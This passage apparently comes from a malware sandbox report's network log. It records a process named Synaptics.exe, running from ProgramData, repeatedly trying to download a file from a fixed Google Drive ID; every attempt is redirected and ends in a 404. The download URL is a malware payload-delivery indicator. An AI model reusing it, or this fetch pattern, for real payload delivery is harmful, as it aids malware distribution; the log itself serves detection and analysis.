                                                                                                                                                                2024-12-25 08:08:08 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                33192.168.2.449896142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:10 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VEg3NIQmKBRtVfTTO6BxOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                34192.168.2.449897142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:10 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0cwDLCAWMUZ--fzZ304OIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                35192.168.2.449904142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:13 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-cPImEMJREEx7o9TcLshPww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                36192.168.2.449906142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:13 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6-UI5mK88lRPswtx-fAsCMQDiZRMSZYgSXkbXmSt71T4zF7kGkEfawWMf2ltJgCP5A
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:13 GMT
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Jou4T4o0EML-4h0QGELL6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:13 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 69 5a 4e 5f 42 78 47 38 36 4b 6f 5a 30 78 57 44 57 37 7a 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="ziZN_BxG86KoZ0xWDW7ztA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                37192.168.2.449905142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:13 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4ATCLUljMnGFjPbXP4pv-C9g3erijnJgFueJ6Y4jdIzA1xrgpTZX60x8FZQcGfabXN
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:13 GMT
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-59cUY-mts2pNKvXhSvNqeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:13 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 73 5f 54 55 75 46 79 39 4b 62 43 6c 66 75 56 6e 70 69 74 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="hs_TUuFy9KbClfuVnpitHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                38192.168.2.449907142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:13 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-KLwtie8W8YAfxJl4A1lwWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                39192.168.2.449926142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:16 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-bda4h8WpZ58vshmWnfDM8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                40192.168.2.449925142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:16 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-CBcSKUZHk-wgUulIiyYC8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                41192.168.2.449944142.250.181.14443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:20 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MSBVic9PSQG9yImMcYXZnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                42192.168.2.449945142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
